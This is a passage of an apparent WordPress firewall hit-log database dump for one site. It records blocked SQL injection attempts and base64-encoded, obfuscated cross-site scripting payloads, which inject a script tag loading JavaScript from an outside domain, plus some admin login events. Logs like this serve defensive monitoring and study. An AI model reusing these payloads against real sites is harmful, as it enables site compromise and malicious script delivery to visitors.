A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8043,1564682697.657223,1564682696.974000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8044,1564682696.025095,1564682695.235100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(8106,1564715975.774839,1564715975.321700,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8045,1564682693.929580,1564682693.099900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwLXBpd2lrXVt0cmFja2luZ19jb2RlXQ==\",\"paramValue\":\"PHNjcmlwdCAgIGFzeW5jPXRydWUgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgbnQgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk4LDEwMSwxMTQsMTE2LDU0KTt2YXIgbWIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDk3LCAxMDYsIDk3LCAxMjAsIDY3LCAxMTEsIDExNywgMTEwLCAxMTYsIDEwMSwgMTE0KTt2YXIgc2IgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGpiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsIDExNiwgMTE2LCAxMTIsIDExNSwgNTgsIDQ3LCA0Nyk7IHZhciB0YiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE2LCAxMDEsIDEyMCwgMTE2LCA0NywgMTA2LCA5NywgMTE4LCA5NywgMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgbGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwMyw5Nyw5OCwxMTQsMTA1LDEwMSwxMDgsMTA4LDk3LDEwOCwxMTEsMTE4LDEwMSw5OSw5NywxMTYsMTE1LDQ2LDk5LDExMSwxMDksNDcsMTA4LDExMSwxMTAsMTAxLDQ2LDEwNiwxMTUsNjMsMTIyLDExMSwxMTAsMTAxLDEwNSwxMDAsNjEsNTYsNTcsNTQsNTMsNTIsNTEsNTAsMzgsMTE3LDExNiwxMDksOTUsOTksNjEsNTIsMzgsMTA5LDExNCwxMTEsNjEpO3ZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoc2IpO2MudHlwZT10YixjLmFzeW5jPTEsYy5zcmM9amIrbGIrbnQ7dmFyIG49ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoc2IpWzBdO24ucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYyxuKTs8L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8160,0.000000,1564987274.722087,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8046,1564682692.103621,1564682690.953000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8107,1564715974.021684,1564715973.615400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8161,0.000000,1564992719.105768,'\0\0\0\0\0\0\0\0\0\0E.$',0,200,0,0,0,'https://companyregistration.online/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(8162,0.000000,1565015678.134852,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,2,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8163,1565025340.506028,1565025340.154300,'\0\0\0\0\0\0\0\0\0\0c&',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTE0LDEwMSwxMTQsNTMsNTUsNTYsNTIpO3ZhciBtYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsIDEwNiwgOTcsIDEyMCwgNjcsIDExMSwgMTE3LCAxMTAsIDExNiwgMTAxLCAxMTQpO3ZhciBzYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgamIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwgMTE2LCAxMTYsIDExMiwgMTE1LCA1OCwgNDcsIDQ3KTsgdmFyIHRiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsIDEwMSwgMTIwLCAxMTYsIDQ3LCAxMDYsIDk3LCAxMTgsIDk3LCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBsYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA2LDk3LDk5LDEwNywxMDUsMTAxLDEwOCwxMTEsMTE4LDEwMSwxMDAsMTExLDEwMywxMTUsNDYsOTksMTExLDEwOSw0Nyw5OSwxMDQsMTExLDExMCwxMDEsNDYsMTA2LDExNSw2MywxMjIsMTExLDExMCwxMDEsMTA1LDEwMCw2MSw0OCw1Nyw1Nyw1NSw1Myw1NCw1MSw1Miw1MywzOCwxMTcsMTE2LDEwOSw5NSw5OSw2MSw1MiwzOCwxMDksMTE0LDExMSw2MSk7dmFyIGM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChzYik7Yy50eXBlPXRiLGMuYXN5bmM9MSxjLnNyYz1qYitsYitudDt2YXIgbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShzYilbMF07bi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShjLG4pOzwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8047,1564682689.908615,1564682688.836900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8048,1564682687.781264,1564682686.970900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8108,1564715970.994690,1564715970.257900,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8049,1564682684.301245,1564682683.115100,'\0\0\0\0\0\0\0\0\0\0%z